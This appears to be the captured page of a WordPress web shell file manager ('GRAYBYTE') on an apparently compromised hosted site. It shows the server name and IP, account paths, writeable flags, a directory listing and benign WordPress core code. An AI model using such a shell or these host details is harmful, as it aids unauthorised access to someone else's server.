$43 GRAYBYTE WORDPRESS FILE MANAGER $53

SERVER : webd004.cluster105.gra.hosting.ovh.net #1 SMP Fri May 15 02:41:25 UTC 2026
SERVER IP : 213.186.33.16 | ADMIN IP 216.73.217.13
OPTIONS : CRL = ON | WGT = ON | SDO = OFF | PKEX = OFF
DEACTIVATED : _dyuweyrj4,_dyuweyrj4r,dl

/home/agencefrei/PLATEFORME-PARACHUTE/wp-admin/

HOME
Current File : /home/agencefrei/PLATEFORME-PARACHUTE/wp-admin//privacy-policy-guide.php
<?php
/**
 * Privacy Policy Guide Screen.
 *
 * @package WordPress
 * @subpackage Administration
 */

/** WordPress Administration Bootstrap */
require_once __DIR__ . '/admin.php';

if ( ! current_user_can( 'manage_privacy_options' ) ) {
	wp_die( __( 'Sorry, you are not allowed to manage privacy options on this site.' ) );
}

if ( ! class_exists( 'WP_Privacy_Policy_Content' ) ) {
	require_once ABSPATH . 'wp-admin/includes/class-wp-privacy-policy-content.php';
}

// Used in the HTML title tag.
$title = __( 'Privacy Policy Guide' );

add_filter(
	'admin_body_class',
	static function ( $body_class ) {
		$body_class .= ' privacy-settings ';

		return $body_class;
	}
);

wp_enqueue_script( 'privacy-tools' );

require_once ABSPATH . 'wp-admin/admin-header.php';

?>
<div class="privacy-settings-header">
	<div class="privacy-settings-title-section">
		<h1>
			<?php _e( 'Privacy' ); ?>
		</h1>
	</div>

	<nav class="privacy-settings-tabs-wrapper hide-if-no-js" aria-label="<?php esc_attr_e( 'Secondary menu' ); ?>">
		<a href="<?php echo esc_url( admin_url( 'options-privacy.php' ) ); ?>" class="privacy-settings-tab">
			<?php
			/* translators: Tab heading for Site Health Status page. */
			_ex( 'Settings', 'Privacy Settings' );
			?>
		</a>

		<a href="<?php echo esc_url( admin_url( 'options-privacy.php?tab=policyguide' ) ); ?>" class="privacy-settings-tab active" aria-current="true">
			<?php
			/* translators: Tab heading for Site Health Status page. */
			_ex( 'Policy Guide', 'Privacy Settings' );
			?>
		</a>
	</nav>
</div>

<hr class="wp-header-end">

<?php
wp_admin_notice(
	__( 'The Privacy Settings require JavaScript.' ),
	array(
		'type'               => 'error',
		'additional_classes' => array( 'hide-if-js' ),
	)
);
?>

<div class="privacy-settings-body hide-if-no-js">
	<h2><?php _e( 'Privacy Policy Guide' ); ?></h2>
	<h3 class="section-title"><?php _e( 'Introduction' ); ?></h3>
	<p><?php _e( 'This text template will help you to create your web site&#8217;s privacy policy.' ); ?></p>
	<p><?php _e( 'The template contains a suggestion of sections you most likely will need. Under each section heading you will find a short summary of what information you should provide, which will help you to get started. Some sections include suggested policy content, others will have to be completed with information from your theme and plugins.' ); ?></p>
	<p><?php _e( 'Please edit your privacy policy content, making sure to delete the summaries, and adding any information from your theme and plugins. Once you publish your policy page, remember to add it to your navigation menu.' ); ?></p>
	<p><?php _e( 'It is your responsibility to write a comprehensive privacy policy, to make sure it reflects all national and international legal requirements on privacy, and to keep your policy current and accurate.' ); ?></p>
	<div class="privacy-settings-accordion">
		<h4 class="privacy-settings-accordion-heading">
			<button aria-expanded="false" class="privacy-settings-accordion-trigger" aria-controls="privacy-settings-accordion-block-privacy-policy-guide" type="button">
				<span class="title"><?php _e( 'Privacy Policy Guide' ); ?></span>
				<span class="icon"></span>
			</button>
		</h4>
		<div id="privacy-settings-accordion-block-privacy-policy-guide" class="privacy-settings-accordion-panel" hidden="hidden">
			<?php
			$content = WP_Privacy_Policy_Content::get_default_content( true, false );
			echo $content;
			?>
		</div>
	</div>
	<hr class="hr-separator">
	<h3 class="section-title"><?php _e( 'Policies' ); ?></h3>
	<div class="privacy-settings-accordion wp-privacy-policy-guide">
		<?php WP_Privacy_Policy_Content::privacy_policy_guide(); ?>
	</div>
</div>
<?php

require_once ABSPATH . 'wp-admin/admin-footer.php';


Current_dir [ WRITEABLE ] Document_root [ WRITEABLE ]


[ Back ]
NAME
SIZE
LAST TOUCH
USER
CAN-I?
FUNCTIONS
..
--
1 Jun 2026 3.14 AM
agencefrei / users
0705
.trash7206
--
5 Mar 2026 9.12 AM
agencefrei / users
0755
css
--
5 Mar 2026 9.12 AM
agencefrei / users
0705
images
--
5 Mar 2026 9.12 AM
agencefrei / users
0705
includes
--
5 Mar 2026 9.12 AM
agencefrei / users
0705
js
--
5 Mar 2026 9.12 AM
agencefrei / users
0705
maint
--
5 Mar 2026 9.12 AM
agencefrei / users
0705
network
--
5 Mar 2026 9.12 AM
agencefrei / users
0705
public-info
--
28 Apr 2026 6.46 AM
agencefrei / users
0755
user
--
5 Mar 2026 9.12 AM
agencefrei / users
0705
about.php
21.772 KB
1 Oct 2025 3.12 AM
agencefrei / users
0644
admin-ajax.php
4.826 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
admin-footer.php
2.757 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
admin-functions.php
0.396 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
admin-header.php
8.82 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
admin-post.php
1.999 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
admin.php
12.265 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
async-upload.php
4.677 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
authorize-application.php
10.093 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
comment.php
11.294 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
contribute.php
5.492 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
credits.php
3.675 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
custom-background.php
0.406 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
custom-header.php
0.416 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
customize.php
10.61 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
edit-comments.php
14.381 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
edit-form-advanced.php
28.629 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
edit-form-blocks.php
11.742 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
edit-form-comment.php
8.344 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
edit-link-form.php
6.213 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
edit-tag-form.php
10.452 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
edit-tags.php
21.91 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
edit.php
19.431 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
erase-personal-data.php
7.361 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
export-personal-data.php
7.759 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
export.php
11.015 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
freedoms.php
4.431 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
import.php
7.468 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
index.php
7.68 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
install-helper.php
6.798 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
install.php
17.091 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
link-add.php
0.725 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
link-manager.php
4.263 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
link-parse-opml.php
2.627 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
link.php
2.696 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
load-scripts.php
1.66 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
load-styles.php
2.564 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
media-new.php
3.185 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
media-upload.php
3.485 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
media.php
0.745 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
menu-header.php
9.836 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
menu.php
16.748 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
moderation.php
0.3 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
ms-admin.php
0.191 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
ms-delete-site.php
4.187 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
ms-edit.php
0.211 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
ms-options.php
0.218 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
ms-sites.php
0.21 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
ms-themes.php
0.212 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
ms-upgrade-network.php
0.214 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
ms-users.php
0.21 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
my-sites.php
4.744 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
nav-menus.php
47.764 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
network.php
5.354 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
options-discussion.php
15.577 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
options-general.php
16.789 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
options-head.php
0.48 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
options-media.php
6.353 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
options-permalink.php
21.123 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
options-privacy.php
9.971 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
options-reading.php
10.072 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
options-writing.php
9.056 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
options.php
13.305 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
plugin-editor.php
13.393 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
plugin-install.php
6.777 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
plugins.php
28.822 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
post-new.php
2.64 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
post.php
9.852 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
press-this.php
2.33 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
privacy-policy-guide.php
3.668 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
privacy.php
2.412 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
profile.php
0.276 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
revision.php
5.469 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
setup-config.php
17.326 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
site-editor.php
5.959 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
site-health-info.php
3.975 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
site-health.php
10.144 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
term.php
2.196 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
theme-editor.php
15.149 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
theme-install.php
23.351 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
themes.php
46.89 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
tools.php
3.432 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
update-core.php
45.2 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
update.php
12.785 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
upgrade-functions.php
0.333 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604
upgrade.php
5.555 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
upload.php
14.842 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
user-edit.php
39.067 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
user-new.php
23.985 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
users.php
23.288 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
widgets-form-blocks.php
4.395 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
widgets-form.php
19.175 KB
21 Feb 2024 9.14 AM
agencefrei / users
0644
widgets.php
1.086 KB
21 Feb 2024 8.40 AM
agencefrei / users
0604

GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME
Static GIF Static GIF